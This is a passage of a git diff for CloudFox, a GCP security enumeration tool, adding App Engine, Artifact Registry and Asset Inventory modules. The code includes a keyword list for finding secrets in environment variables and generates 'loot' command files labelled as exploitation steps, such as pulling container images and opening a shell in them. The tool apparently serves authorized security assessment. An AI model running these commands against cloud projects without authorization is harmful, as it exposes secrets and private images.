range rules.IngressRules { + fwRule := AppEngineFirewallRule{ + ProjectID: projectID, + Priority: rule.Priority, + Action: rule.Action, + SourceRange: rule.SourceRange, + Description: rule.Description, + } + + m.mu.Lock() + m.FirewallRules = append(m.FirewallRules, fwRule) + m.mu.Unlock() + } + + m.mu.Lock() + for i := range m.Apps { + if m.Apps[i].ProjectID == projectID { + m.Apps[i].FirewallRules = len(rules.IngressRules) + break + } + } + m.mu.Unlock() +} + +func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, versionID, projectID string) int { + secretPatterns := []string{ + "PASSWORD", "SECRET", "API_KEY", "TOKEN", "PRIVATE_KEY", + "DATABASE_URL", "DB_PASSWORD", "MYSQL_PASSWORD", "POSTGRES_PASSWORD", + "MONGODB_URI", "AWS_SECRET", "ENCRYPTION_KEY", "JWT_SECRET", "SESSION_SECRET", + } + + secretCount := 0 + + for name := range envVars { + nameUpper := strings.ToUpper(name) + for _, pattern := range secretPatterns { + if strings.Contains(nameUpper, pattern) { + secretCount++ + m.mu.Lock() + m.secretsFound++ + + m.LootMap["appengine-commands"].Contents += fmt.Sprintf( + "# Potential secret in env var: %s (service: %s, version: %s)\n"+ + "# Recommendation: Migrate to Secret Manager\n"+ + "gcloud app versions describe %s --service=%s --project=%s\n\n", + name, serviceID, versionID, + versionID, serviceID, projectID, + ) + m.mu.Unlock() + break + } + } + } + + return secretCount +} + +func (m *AppEngineModule) isDeprecatedRuntime(runtime string) bool { + deprecatedRuntimes := []string{ + "python27", "go111", "go112", "go113", "java8", "java11", + "nodejs10", "nodejs12", "php55", "php72", "ruby25", + } + + for _, deprecated := range deprecatedRuntimes { + if runtime == deprecated { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *AppEngineModule) initializeLootFiles() { + m.LootMap["appengine-commands"] = &internal.LootFile{ + Name: "appengine-commands", + Contents: "# App Engine Commands\n" + + "# Generated by CloudFox\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Unified table with all columns + header := []string{ + "Project ID", + "Project Name", + "App ID", + "Location", + "Status", + "Hostname", + "Service", + "Version", + "Runtime", + "Environment", + "Ingress", + "Public", + "Service Account", + "Default SA", + "Deprecated", + "Env Vars", + "Secrets", + "VPC Connector", + "URL", + } + + var body [][]string + + if len(m.Versions) > 0 { + // We have versions - show full details for each version + for _, ver := range m.Versions { + // Find the corresponding app for this version + var app AppEngineApp + for _, a := range m.Apps { + if a.ProjectID == ver.ProjectID { + app = a + break + } + } + + publicStr := "No" + if ver.Public { + publicStr = "Yes" + } + + defaultSAStr := "No" + if ver.DefaultSA { + defaultSAStr = "Yes" + } + + deprecatedStr := "No" + if ver.DeprecatedRuntime { + deprecatedStr = "Yes" + } + + body = append(body, []string{ + ver.ProjectID, + m.GetProjectName(ver.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + ver.ServiceID, + ver.ID, + ver.Runtime, + ver.Environment, + ver.IngressSettings, + publicStr, + ver.ServiceAccount, + defaultSAStr, + deprecatedStr, + fmt.Sprintf("%d", ver.EnvVarCount), + fmt.Sprintf("%d", ver.SecretEnvVars), + ver.VPCConnector, + ver.URL, + }) + + // Add to loot + if ver.Public { + m.LootMap["appengine-commands"].Contents += fmt.Sprintf( + "# Public App Engine service: %s/%s\n"+ + "curl %s\n\n", + ver.ServiceID, ver.ID, ver.URL, + ) + } + } + } else { + // No versions - show app info with "No services deployed" for version columns + for _, app := range m.Apps { + body = append(body, []string{ + app.ProjectID, + m.GetProjectName(app.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + "No services deployed", + "", + "", + "", + "", + "", + app.ServiceAccount, + "", + "", + "", + "", + "", + "", + }) + } + } + + tables = append(tables, internal.TableFile{ + Name: "appengine", + Header: header, + Body: body, + }) + + // Firewall rules table + if len(m.FirewallRules) > 0 { + var fwBody [][]string + for _, rule := range m.FirewallRules { + fwBody = append(fwBody, []string{ + rule.ProjectID, + m.GetProjectName(rule.ProjectID), + fmt.Sprintf("%d", rule.Priority), + rule.Action, + rule.SourceRange, + rule.Description, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "appengine-firewall", + Header: []string{ + "Project ID", + "Project Name", + "Priority", + "Action", + "Source Range", + "Description", + }, + Body: fwBody, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := AppEngineOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_APPENGINE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 3214fc43..ed393abd 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -1,10 +1,14 @@ package commands import ( + "context" "fmt" + "strings" + "sync" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" ArtifactRegistryService "github.com/BishopFox/cloudfox/gcp/services/artifactRegistryService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" @@ -12,161 +16,429 @@ import ( var GCPArtifactRegistryCommand = &cobra.Command{ Use: globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP artifact registry information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available artifact registry resource information: -cloudfox gcp artfact-registry`, + Aliases: []string{"ar", "artifacts", "gcr"}, + Short: "Enumerate GCP Artifact Registry and Container Registry with security configuration", + Long: `Enumerate GCP Artifact Registry and legacy Container Registry (gcr.io) with security-relevant details. + +Features: +- Lists all Artifact Registry repositories with security configuration +- Shows Docker images and package artifacts with tags and digests +- Enumerates IAM policies per repository and identifies public repositories +- Shows encryption type (Google-managed vs CMEK) +- Shows repository mode (standard, virtual, remote) +- Generates gcloud commands for artifact enumeration +- Generates exploitation commands for artifact access +- Enumerates legacy Container Registry (gcr.io) locations + +Security Columns: +- Public: Whether the repository has allUsers or allAuthenticatedUsers access +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Mode: STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, or REMOTE_REPOSITORY +- RegistryType: "artifact-registry" or "container-registry" (legacy gcr.io)`, Run: runGCPArtifactRegistryCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ArtifactRegistryModule struct { + gcpinternal.BaseGCPModule -// Results struct that implements the internal.OutputInterface -type GCPArtifactRegistryResults struct { - ArtifactData []ArtifactRegistryService.ArtifactInfo - RepositoryData []ArtifactRegistryService.RepositoryInfo + // Module-specific fields + Artifacts []ArtifactRegistryService.ArtifactInfo + Repositories []ArtifactRegistryService.RepositoryInfo + LootMap map[string]*internal.LootFile + client *artifactregistry.Client + mu sync.Mutex } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPArtifactRegistryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ArtifactRegistryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - repoHeader := []string{ - "Name", - "Format", - "Description", - "Size", - "Location", - "ProjectID", +func (o ArtifactRegistryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ArtifactRegistryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + if err != nil { + return // Error already logged } - var repoBody [][]string + // Create Artifact Registry client + client, err := artifactregistry.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Artifact Registry client: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return + } + defer client.Close() - for _, value := range g.RepositoryData { - repoBody = append( - repoBody, - []string{ - value.Name, - value.Format, - value.Description, - value.SizeBytes, - value.Location, - value.ProjectID, - }, - ) + // Create module instance + module := &ArtifactRegistryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Artifacts: []ArtifactRegistryService.ArtifactInfo{}, + Repositories: []ArtifactRegistryService.RepositoryInfo{}, + LootMap: make(map[string]*internal.LootFile), + client: client, } - repoTableFile := internal.TableFile{ - Header: repoHeader, - Body: repoBody, - Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ArtifactRegistryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, m.processProject) + + // Check results + if len(m.Repositories) == 0 && len(m.Artifacts) == 0 { + logger.InfoM("No artifact registries found", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return } - tableFiles = append(tableFiles, repoTableFile) + logger.SuccessM(fmt.Sprintf("Found %d repository(ies) with %d artifact(s)", len(m.Repositories), len(m.Artifacts)), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - artifactHeader := []string{ - "Name", - "Format", - "Version", - "Location", - "Repository", - "Size", - "Updated", - "ProjectID", + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating artifact registries in project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) } - var artifactBody [][]string + // Create service and fetch data + ars := ArtifactRegistryService.New(m.client) + result, err := ars.RepositoriesAndArtifacts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Could not enumerate artifact registries in project %s", projectID)) + return + } - for _, value := range g.ArtifactData { - artifactBody = append( - artifactBody, - []string{ - value.Name, - value.Format, - value.Version, - value.Location, - value.Repository, - value.SizeBytes, - value.Updated, - value.ProjectID, - }, - ) + // Thread-safe append + m.mu.Lock() + m.Repositories = append(m.Repositories, result.Repositories...) + m.Artifacts = append(m.Artifacts, result.Artifacts...) + + // Generate loot for each repository and artifact + for _, repo := range result.Repositories { + m.addRepositoryToLoot(repo) + } + for _, artifact := range result.Artifacts { + m.addArtifactToLoot(artifact) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) and %d artifact(s) in project %s", len(result.Repositories), len(result.Artifacts), projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ArtifactRegistryModule) initializeLootFiles() { + m.LootMap["artifact-registry-commands"] = &internal.LootFile{ + Name: "artifact-registry-commands", + Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *ArtifactRegistryModule) addRepositoryToLoot(repo ArtifactRegistryService.RepositoryInfo) { + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] } - artifactTableFile := internal.TableFile{ - Header: artifactHeader, - Body: artifactBody, - Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + // Handle legacy Container Registry differently + if repo.RegistryType == "container-registry" { + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Legacy Container Registry: %s (Project: %s)\n"+ + "# Note: Consider migrating to Artifact Registry\n"+ + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s\n"+ + "# List images:\n"+ + "gcloud container images list --repository=%s/%s\n"+ + "# Check for public access (via storage bucket):\n"+ + "gsutil iam get gs://artifacts.%s.appspot.com\n\n", + repo.Name, repo.ProjectID, + strings.Split(repo.Name, "/")[0], // gcr.io hostname + strings.Split(repo.Name, "/")[0], repo.ProjectID, + repo.ProjectID, + ) + return } - tableFiles = append(tableFiles, artifactTableFile) + // Repository header and enumeration commands + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Repository: %s (Project: %s, Location: %s)\n"+ + "# Format: %s, Mode: %s, Encryption: %s, Public: %s\n"+ + "# Describe repository:\n"+ + "gcloud artifacts repositories describe %s --project=%s --location=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud artifacts repositories get-iam-policy %s --project=%s --location=%s\n", + repoName, repo.ProjectID, repo.Location, + repo.Format, repo.Mode, repo.EncryptionType, repo.PublicAccess, + repoName, repo.ProjectID, repo.Location, + repoName, repo.ProjectID, repo.Location, + ) + + // Docker-specific commands + if repo.Format == "DOCKER" { + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s-docker.pkg.dev\n"+ + "# List images:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n"+ + "# List vulnerabilities:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s --show-occurrences --occurrence-filter=\"kind=VULNERABILITY\"\n", + repo.Location, + repo.Location, repo.ProjectID, repoName, + repo.Location, repo.ProjectID, repoName, + ) + } - return tableFiles + m.LootMap["artifact-registry-commands"].Contents += "\n" } -// Decide what is loot based on resource information -func (g GCPArtifactRegistryResults) LootFiles() []internal.LootFile { - // TODO consider a loot file of the URLs to the all docker image artifacts. Maybe sample commands to pull the images - return []internal.LootFile{} +func (m *ArtifactRegistryModule) addArtifactToLoot(artifact ArtifactRegistryService.ArtifactInfo) { + // Exploitation commands for Docker images + if artifact.Format == "DOCKER" { + imageBase := fmt.Sprintf("%s-docker.pkg.dev/%s/%s/%s", + artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name) + + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "## Docker Image: %s (Project: %s)\n"+ + "# Repository: %s, Location: %s\n"+ + "# Digest: %s\n", + artifact.Name, artifact.ProjectID, + artifact.Repository, artifact.Location, + artifact.Digest, + ) + + // Generate commands for each tag + if len(artifact.Tags) > 0 { + for _, tag := range artifact.Tags { + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# Tag: %s\n"+ + "docker pull %s:%s\n"+ + "docker inspect %s:%s\n"+ + "docker run -it --entrypoint /bin/sh %s:%s\n\n", + tag, + imageBase, tag, + imageBase, tag, + imageBase, tag, + ) + } + } else { + // No tags, use digest + m.LootMap["artifact-registry-commands"].Contents += fmt.Sprintf( + "# No tags - use digest\n"+ + "docker pull %s@%s\n"+ + "docker inspect %s@%s\n"+ + "docker run -it --entrypoint /bin/sh %s@%s\n\n", + imageBase, artifact.Digest, + imageBase, artifact.Digest, + imageBase, artifact.Digest, + ) + } + } } -// Houses high-level logic that retrieves resources and writes to output -func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Repository table with IAM columns (one row per IAM member) + repoHeader := []string{ + "Project ID", + "Project Name", + "Name", + "Format", + "Location", + "Mode", + "Public", + "Encryption", + "Role", + "Member Type", + "Member", } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + var repoBody [][]string + publicCount := 0 + for _, repo := range m.Repositories { + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } + + // Format public access display + publicDisplay := "" + if repo.IsPublic { + publicDisplay = repo.PublicAccess + publicCount++ + } + + // Shorten mode for display + mode := repo.Mode + mode = strings.TrimPrefix(mode, "REPOSITORY_MODE_") + mode = strings.TrimSuffix(mode, "_REPOSITORY") + + // One row per IAM member + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + for _, member := range binding.Members { + memberType := ArtifactRegistryService.GetMemberType(member) + repoBody = append(repoBody, []string{ + repo.ProjectID, + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Repository with no IAM bindings + repoBody = append(repoBody, []string{ + repo.ProjectID, + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + "-", + "-", + "-", + }) + } } - client, err := artifactregistry.NewClient(ctx) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) - return + // Artifact table + artifactHeader := []string{ + "Project ID", + "Project Name", + "Name", + "Repository", + "Location", + "Tags", + "Digest", + "Size", + "Uploaded", } - defer client.Close() - // Get the artifact repositories and artifacts using the projectIDs and ArtifactRegistryService - ars := ArtifactRegistryService.New(client) - var artifactResults []ArtifactRegistryService.ArtifactInfo - var repoRestuls []ArtifactRegistryService.RepositoryInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all artifact repositories and supported artifacts in all locations from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - result, err := ars.RepositoriesAndArtifacts(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return + var artifactBody [][]string + for _, artifact := range m.Artifacts { + // Format tags + tags := "-" + if len(artifact.Tags) > 0 { + if len(artifact.Tags) <= 3 { + tags = strings.Join(artifact.Tags, ", ") + } else { + tags = fmt.Sprintf("%s (+%d more)", strings.Join(artifact.Tags[:3], ", "), len(artifact.Tags)-3) + } } - artifactResults = append(artifactResults, result.Artifacts...) - repoRestuls = append(repoRestuls, result.Repositories...) - logger.InfoM(fmt.Sprintf("Done retrieving artifact repository resource data from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - cloudfoxOutput := GCPArtifactRegistryResults{ArtifactData: artifactResults, RepositoryData: repoRestuls} + digest := artifact.Digest - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return + artifactBody = append(artifactBody, []string{ + artifact.ProjectID, + m.GetProjectName(artifact.ProjectID), + artifact.Name, + artifact.Repository, + artifact.Location, + tags, + digest, + artifact.SizeBytes, + artifact.Uploaded, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: repoHeader, + Body: repoBody, + }, + } + + // Add artifacts table if there are any + if len(artifactBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: artifactHeader, + Body: artifactBody, + }) + } + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible repository(ies)!", publicCount), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + output := ArtifactRegistryOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go new file mode 100644 index 00000000..937f0348 --- /dev/null +++ b/gcp/commands/assetinventory.go @@ -0,0 +1,693 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + asset "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/asset/apiv1/assetpb" + assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + "google.golang.org/api/iterator" +) + +var ( + assetTypes []string + showCounts bool + checkIAM bool + showDependencies bool + showAll bool +) + +var GCPAssetInventoryCommand = &cobra.Command{ + Use: globals.GCP_ASSET_INVENTORY_MODULE_NAME, + Aliases: []string{"assets", "inventory", "cai", "resource-graph"}, + Short: "Enumerate Cloud Asset Inventory with optional dependency analysis", + Long: `Enumerate resources using Cloud Asset Inventory API. + +Features: +- Lists all assets in a project +- Provides asset counts by type +- Can check IAM policies for public access +- Supports filtering by asset type +- Analyzes resource dependencies and cross-project relationships +- Generates query templates for common security use cases + +Flags can be combined to run multiple analyses in a single run. + +Examples: + cloudfox gcp asset-inventory -p my-project + cloudfox gcp asset-inventory -p my-project --counts + cloudfox gcp asset-inventory -p my-project --iam + cloudfox gcp asset-inventory -p my-project --dependencies + cloudfox gcp asset-inventory -p my-project --counts --iam --dependencies + cloudfox gcp asset-inventory -p my-project --all + cloudfox gcp asset-inventory -p my-project --types compute.googleapis.com/Instance,storage.googleapis.com/Bucket`, + Run: runGCPAssetInventoryCommand, +} + +func init() { + GCPAssetInventoryCommand.Flags().StringSliceVar(&assetTypes, "types", []string{}, "Filter by asset types (comma-separated)") + GCPAssetInventoryCommand.Flags().BoolVar(&showCounts, "counts", false, "Show asset counts by type") + GCPAssetInventoryCommand.Flags().BoolVar(&checkIAM, "iam", false, "Check IAM policies for public access") + GCPAssetInventoryCommand.Flags().BoolVar(&showDependencies, "dependencies", false, "Analyze resource dependencies and cross-project relationships") + GCPAssetInventoryCommand.Flags().BoolVar(&showAll, "all", false, "Run all analyses (counts, IAM, dependencies)") +} + +// ResourceDependency represents a dependency between two resources +type ResourceDependency struct { + SourceResource string + SourceType string + TargetResource string + TargetType string + DependencyType string // uses, references, contains + ProjectID string +} + +// CrossProjectResource represents a resource accessed from multiple projects +type CrossProjectResource struct { + ResourceName string + ResourceType string + OwnerProject string + AccessedFrom []string +} + +type AssetInventoryModule struct { + gcpinternal.BaseGCPModule + Assets []assetservice.AssetInfo + TypeCounts []assetservice.AssetTypeCount + Dependencies []ResourceDependency + CrossProject []CrossProjectResource + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type AssetInventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AssetInventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AssetInventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAssetInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ASSET_INVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &AssetInventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Assets: []assetservice.AssetInfo{}, + TypeCounts: []assetservice.AssetTypeCount{}, + Dependencies: []ResourceDependency{}, + CrossProject: []CrossProjectResource{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *AssetInventoryModule) Execute(ctx context.Context, logger internal.Logger) { + // If --all is set, enable all flags + if showAll { + showCounts = true + checkIAM = true + showDependencies = true + } + + // If no flags set, default to basic asset listing + noFlagsSet := !showCounts && !checkIAM && !showDependencies + + // Run requested analyses + if showCounts { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectCounts) + } + + if checkIAM { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProjectIAM) + } else if noFlagsSet { + // Only run basic listing if no flags and IAM not requested (IAM includes basic info) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ASSET_INVENTORY_MODULE_NAME, m.processProject) + } + + if showDependencies { + m.processProjectsDependencies(ctx, logger) + } + + // Build summary message + var summaryParts []string + + if len(m.TypeCounts) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset type(s)", len(m.TypeCounts))) + } + + if len(m.Assets) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d asset(s)", len(m.Assets))) + } + + if checkIAM { + publicCount := 0 + for _, asset := range m.Assets { + if asset.PublicAccess { + publicCount++ + } + } + if publicCount > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d with public access", publicCount)) + } + } + + if len(m.Dependencies) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d dependencies", len(m.Dependencies))) + } + + if len(m.CrossProject) > 0 { + summaryParts = append(summaryParts, fmt.Sprintf("%d cross-project resources", len(m.CrossProject))) + } + + if len(summaryParts) == 0 { + logger.InfoM("No assets found", globals.GCP_ASSET_INVENTORY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %s", strings.Join(summaryParts, ", ")), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *AssetInventoryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + assets, err := svc.ListAssets(projectID, assetTypes) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) + return + } + + m.mu.Lock() + m.Assets = append(m.Assets, assets...) + for _, asset := range assets { + m.addToLoot(asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectIAM(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating assets with IAM in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + assets, err := svc.ListAssetsWithIAM(projectID, assetTypes) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets with IAM in project %s", projectID)) + return + } + + m.mu.Lock() + m.Assets = append(m.Assets, assets...) + for _, asset := range assets { + m.addToLoot(asset) + } + m.mu.Unlock() +} + +func (m *AssetInventoryModule) processProjectCounts(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Counting assets in project: %s", projectID), globals.GCP_ASSET_INVENTORY_MODULE_NAME) + } + + svc := assetservice.New() + counts, err := svc.GetAssetTypeCounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ASSET_INVENTORY_MODULE_NAME, + fmt.Sprintf("Could not count assets in project %s", projectID)) + return + } + + m.mu.Lock() + // Merge counts from multiple projects + countMap := make(map[string]int) + for _, c := range 